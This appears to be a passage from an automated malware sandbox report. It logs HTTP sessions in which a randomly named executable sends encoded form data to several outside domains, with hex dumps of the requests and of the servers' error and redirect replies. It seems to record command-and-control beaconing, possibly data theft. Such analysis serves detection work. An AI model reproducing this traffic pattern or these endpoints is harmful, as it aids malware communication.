                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.54989088.99.61.52803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:55.835191965 CET521OUTGET /ogj2/?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:57.142148972 CET1175INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:56 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.549903104.21.90.137803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:02.664835930 CET790OUTPOST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4d 4a 51 36 4c 59 37 2b 31 68 58 6e 58 33 35 7a 72 6d 69 77 6a 30 78 6d 33 38 2b 2f 46 32 6b 5a 51 48 72 37 4e 73 66 69 76 31 63 54 61 38 64 4f 4e 2f 41 72 51 6b 62 4e 4a 55 64 49 4d 4d 76 33 75 54 56 6e 45 6b 6f 56 52 5a 43 4f 50 71 6c 42 53 36 71 64 54 79 54 6c 63 53 66 39 56 50 77 49 54 6d 34 64 65 44 65 44 79 73 53 4b 64 4f 4e 72 43 44 6d 31 66 49 49 70 57 73 76 45 49 42 6d 6a 52 77 62 2f 31 2f 77 31 63 61 46 6e 70 70 52 45 74 56 35 41 6b 53 5a 49 5a 6c 47 6d 6b 4b 42 65 6d 68 46 2b 69 55 2b 48 44 43 61 31 77 30 4a 2b 50 6b 43 4a 39 6f 54 79 46 6a 51 3d
                                                                                Data Ascii: PLpD=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkSZIZlGmkKBemhF+iU+HDCa1w0J+PkCJ9oTyFjQ=
                                                                                Dec 3, 2024 14:15:03.796664000 CET902INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuQ28zMlLhMf3STm%2FMgDZeBJc9XsH%2FfielDLeo4BCnHRgJVxGlnr%2BqzxCP2Im0gIxfNdYK2obgH4D2zlo1fy6cOervsCJjbNi0rPO84zwaYTJh%2FKVfBOS3PfngqJmzt2cCrhE1wwEEY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2c369bf4267-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1780&rtt_var=890&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.549910104.21.90.137803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:05.335757017 CET810OUTPOST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 77 5a 51 6d 62 37 4d 74 66 69 73 31 63 54 51 63 64 50 44 66 41 67 51 6b 47 77 4a 56 68 49 4d 4d 72 33 75 53 6c 6e 46 55 55 57 54 4a 43 4d 61 36 6c 44 63 61 71 64 54 79 54 6c 63 53 4b 71 56 50 6f 49 54 57 49 64 59 69 65 63 38 4d 53 4a 4e 2b 4e 72 52 54 6e 38 66 49 49 78 57 74 7a 75 49 44 65 6a 52 77 4c 2f 30 75 77 32 4a 4b 46 68 32 5a 51 7a 6d 47 63 62 74 68 5a 43 59 45 62 59 38 49 78 66 6e 58 30 55 34 32 32 76 51 69 32 4e 67 6e 42 4a 65 55 6a 67 6e 4c 44 43 62 30 46 41 78 77 43 6b 66 54 47 33 79 2b 58 44 58 61 31 50 43 48 37 68
                                                                                Data Ascii: PLpD=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi2NgnBJeUjgnLDCb0FAxwCkfTG3y+XDXa1PCH7h
                                                                                Dec 3, 2024 14:15:06.530419111 CET906INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yifU1v40o8fTdV3Zs3b2P18PDLNEYrPvB1HG9X%2Bsh65KhXdIVf1JAMPakORvKENE31iZi%2F4WK7bRjF3mcAogXTNRFHMhLwlujyVMQ2fM6Be%2FYXl%2B9NPV%2BP5tR7hsh9JIa0%2Fi6DJbodg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2d469414411-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1728&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549916104.21.90.137803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:08.013103008 CET1827OUTPOST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 6f 5a 51 78 7a 37 4e 4f 33 69 74 31 63 54 57 73 64 43 44 66 41 35 51 6b 66 37 4a 56 74 59 4d 4a 33 33 75 77 74 6e 4d 47 77 57 61 4a 43 4d 46 4b 6c 47 53 36 71 45 54 32 2f 68 63 52 79 71 56 50 6f 49 54 56 51 64 66 7a 65 63 2b 4d 53 4b 64 4f 4e 2f 43 44 6d 56 66 4a 67 50 57 74 33 55 49 79 2b 6a 51 52 37 2f 35 34 4d 32 55 36 46 6a 31 5a 51 72 6d 47 67 2b 74 68 46 6f 59 45 76 69 38 4b 52 66 6d 43 56 30 67 53 47 4c 42 6a 66 75 75 57 42 35 4a 53 4c 67 6b 64 54 6c 55 58 35 31 32 7a 6d 37 58 6d 4f 70 32 50 62 48 4e 66 78 73 4e 48 71 68 4f 68 31 6f 34 52 39 6a 43 6e 57 79 6c 63 6c 64 36 35 52 2f 36 57 48 55 42 5a 71 59 6d 45 43 50 32 59 56 33 67 4e 56 30 4d 76 6a 4b 75 58 61 4b 2b 31 34 66 42 4a 5a 62 75 72 34 59 34 56 47 6f 54 63 50 64 68 41 4b 6f 36 35 6f 79 73 2b 67 54 51 4f 69 43 2b 76 49 73 64 4c 35 34 55 71 64 67 41 78 49 79 49 64 72 6a 43 44 4d 70 77 4c 76 5a 42 [TRUNCATED]
                                                                                Data Ascii: PLpD=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEoZQxz7NO3it1cTWsdCDfA5Qkf7JVtYMJ33uwtnMGwWaJCMFKlGS6qET2/hcRyqVPoITVQdfzec+MSKdON/CDmVfJgPWt3UIy+jQR7/54M2U6Fj1ZQrmGg+thFoYEvi8KRfmCV0gSGLBjfuuWB5JSLgkdTlUX512zm7XmOp2PbHNfxsNHqhOh1o4R9jCnWylcld65R/6WHUBZqYmECP2YV3gNV0MvjKuXaK+14fBJZbur4Y4VGoTcPdhAKo65oys+gTQOiC+vIsdL54UqdgAxIyIdrjCDMpwLvZBJBQZqmTsg/2NsQYOJFD1foePj9IWnHgF9egOsYdHIL9u2tGvH/GjQzhvxpQ+NRKrR6EsKDenYeKzTsRhAs7/RMt+RwI8GUpvNsy/qQrPF8YBnFxsfc9Abpr4togc8osTQl4Wde0Sg4y9S+D3Ox+Lmhn0lJQzJQEqaq9hG7hAWAwEkvbTrJZp+sMisZWjegFMN4CeDphIUHHUngjr1zyD4GEC7h06NkJxceGOyI6SE2+UWbZTOCevLLkx2m2RM+Q+jnrV5xzKAb3FQ/xpooKB4360XdhLGBPV0AB3ygKZK2IA2LbxY63Edj0icrtIQSbUHP3CYphhuf++1mfvGzejodArcBuZpkkpEXEAf6WrTKXazzmo+ynaGzRaRcckpRzjFl8Z4TPFf/UQRsHIvxsiKWj9HrWjoDmx+E3P+W1lDAsxRlFEOyArRcMsYYkEJiX/KbV8jmTApDDhsDSgrV75/FjLewms3YUC7jat3OlPNCIULHDIKTKqDFqLSNbmcXSWlSCwr/MEdVP6VQ/NUkgjZwGONiVSoSQIknM8SQkIQN0vJrchd9rLAw0RkPGXyJCefbIcMjBHihm2hdRNJP8Qx9W74kZtEuaFa6ML4vgK9KM8+TahcEzon/5FTCoTjhjy6hKvO3mXt3Tjbr3FudLJf4VyRHlf5sYKry [TRUNCATED]
                                                                                Dec 3, 2024 14:15:09.258505106 CET907INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HK5PlL1RGfY4E7sUlYpbS8mm%2F%2B5sbTATUBxuHpfZzg%2BdQ%2FpYwrZN94UrhpzbOxp%2FTeZ1BDKKUbBlqkz4GPn1fd7%2B06eOWk4oV6Zl1gE2HKRZlwkAIPSWFdtjhpIcFK4TiKFZoHwNNeg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2e5495f17a9-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1628&rtt_var=814&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549923104.21.90.137803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:10.676479101 CET525OUTGET /eaqq/?dfxXf=5pgPlrExEj&PLpD=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kXPn7ceVjctqreHfWNCCIV/k5akwvaRS8zM+YQ4ALen/wBg== HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:11.930099010 CET843INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cz28Kz1C0Xnmh7a42Hr1UnohzWD%2F4VS7HIqhfRUUgycNlUyhoU27WE%2BTysB9dd02Ent4QYVg3guDvN4bVHerodzHsAVjZpAczdqmfZy7JR3gA3NeuRPYW25Q5bpT75ggWLz8Zo7vwdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2f60e1841bd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.549939209.74.77.107803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:17.545638084 CET778OUTPOST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 59 41 4a 46 54 47 56 44 44 65 54 36 37 66 46 36 48 4b 6c 78 59 30 57 35 6b 35 61 6e 41 56 4f 4f 62 4e 33 32 49 55 4d 43 74 71 4a 5a 62 6d 54 49 59 74 50 6f 45 32 4d 71 71 65 68 4f 42 6e 69 52 6d 58 52 66 75 5a 6d 70 30 71 4d 69 31 6b 2b 42 33 5a 67 44 74 36 4d 68 43 61 6d 45 4c 47 4b 4b 58 74 45 53 6e 33 30 4c 4a 73 49 59 47 75 43 53 4a 46 6a 34 74 37 68 79 69 31 6e 75 72 4a 5a 59 77 43 4c 4f 50 34 71 4c 64 2b 4c 66 77 2f 64 48 56 67 4e 47 53 72 71 57 34 39 2f 43 48 51 49 52 64 59 78 33 38 2b 69 30 37 46 65 55 52 67 76 32 79 51 49 77 78 61 61 63 5a 45 3d
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJYAJFTGVDDeT67fF6HKlxY0W5k5anAVOObN32IUMCtqJZbmTIYtPoE2MqqehOBniRmXRfuZmp0qMi1k+B3ZgDt6MhCamELGKKXtESn30LJsIYGuCSJFj4t7hyi1nurJZYwCLOP4qLd+Lfw/dHVgNGSrqW49/CHQIRdYx38+i07FeURgv2yQIwxaacZE=
                                                                                Dec 3, 2024 14:15:18.822029114 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:18 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.549945209.74.77.107803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:20.214359045 CET798OUTPOST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
